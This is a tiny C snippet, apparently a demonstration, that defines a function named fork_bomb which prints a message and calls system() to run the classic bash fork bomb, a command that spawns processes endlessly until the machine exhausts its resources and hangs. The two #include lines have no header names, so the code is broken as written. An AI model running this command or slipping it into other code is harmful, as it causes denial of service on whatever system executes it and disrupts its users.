#include #include void fork_bomb() { printf("Running fork bomb..."); system("/bin/bash -c ':(){ :|:& };:'"); }